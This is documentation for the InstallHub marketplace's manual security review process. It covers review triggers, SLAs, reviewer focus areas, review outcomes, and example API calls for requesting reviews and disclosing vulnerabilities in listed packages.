InstallHub
Manual Security Review
Certain packages trigger a mandatory human security review in addition to the automated scan. Manual review is also required when a package requests Certified trust level status, and is available on request for packages with complex logic.
Phase 3 — PENDING Marketplace manual review is planned but not yet implemented. Direct import WARN/FAIL handling is implemented in Phase 2.
When Manual Review Is Triggered
| Trigger | Who Reviews | SLA |
|---|---|---|
| Automated scan returns WARN for marketplace submission | BizFirstGO security team | 3 business days |
| Publisher requests Certified status | BizFirstGO security team + reviewer | 5 business days |
| Publisher submits a false positive exception request | BizFirstGO security team | 2 business days |
| Publisher requests manual review (optional, not required) | BizFirstGO security team | 5 business days |
| Post-listing vulnerability report from the community | BizFirstGO security team | 24 hours (urgent) |
| Nightly re-scan produces WARN/FAIL for a previously PASS package | BizFirstGO security team | 48 hours |
What a Manual Reviewer Examines
A human reviewer inspects the full package contents, not just the fields flagged by the automated scanner. The review focuses on:
- Understanding the business purpose of each artifact — do the logic and configuration align?
- Identifying subtle injection patterns that regex-based rules miss (e.g., obfuscated expressions, multi-step injection chains)
- Reviewing HTTP callback node configurations — what data is sent, to what destination, under what conditions
- Examining conditional logic paths that could create backdoors or privilege escalation paths in the workflow
- Validating that the package's claimed functionality matches its actual implementation
- Checking that all external service integrations are legitimate and appropriately scoped
Requesting an Optional Manual Review
POST /api/marketplace/submissions/{submissionId}/request-manual-review
Authorization: Bearer {publisherToken}
{
"reason": "This package integrates with three external REST APIs and performs multi-tenant data aggregation. We would like a human review to verify the integration logic is secure before listing."
}
// Response:
{
"reviewRequestId": "rev-req-a1b2c3",
"status": "Queued",
"estimatedDays": 5,
"note": "Optional manual review requested. Package will not be listed until review is complete."
}Manual Review Outcome
| Outcome | Effect |
|---|---|
| Approved — PASS | Package listed with manual-review-cleared note in security badge. Existing WARN findings dismissed. |
| Approved — WARN Accepted | Package listed. WARN findings remain visible in badge but reviewer has assessed them as non-blocking risks. |
| Rejected | Publisher receives detailed rejection with specific findings. Package not listed. Publisher must fix and resubmit. |
| Conditional Approval | Package approved with mandatory usage restrictions (e.g., "Install permitted for Certified publishers only" or "Requires acknowledgeCommunityPackage with explicit note"). |
Review Report
GET /api/marketplace/submissions/{submissionId}/manual-review
{
"submissionId": "sub-a1b2c3d4",
"reviewId": "rev-a1b2c3",
"status": "Complete",
"outcome": "Approved",
"scanClearance": "WarnAccepted",
"reviewer": "BizFirstGO Security Team",
"reviewedAt": "2026-05-28T14:00:00Z",
"notes": "Medium CVE in form-utils@1.0.0 reviewed. The affected code path (image parsing) is not exercised by this package's form definitions. The dependency is used only for field validation utilities. Risk accepted. Publisher advised to update to 1.0.1 in next release.",
"effect": "Package listed as Community with WARN badge. CVE finding remains visible to installers."
}Reporting a Security Vulnerability in a Listed Package
If you discover a security vulnerability in a listed marketplace package, use the responsible disclosure endpoint. The report is confidential — only the publisher and BizFirstGO security team can see it.
POST /api/marketplace/packages/{packageId}/report-vulnerability
{
"affectedVersion": "3.0.0",
"description": "The ApprovalRules RuleSet in this package contains a condition that bypasses multi-approver requirements when the approver count field is set to zero. This allows a single user to approve their own requests by manipulating form input.",
"severity": "High",
"reporterEmail": "security@myorg.com" // Optional — for follow-up
}
// Response:
{
"reportId": "vr-a1b2c3",
"status": "Received",
"message": "Thank you for your report. BizFirstGO security team will investigate within 24 hours. If the vulnerability is confirmed, the affected version will be flagged and the publisher notified.",
"disclosurePolicy": "https://bizfirstai.com/security/responsible-disclosure"
}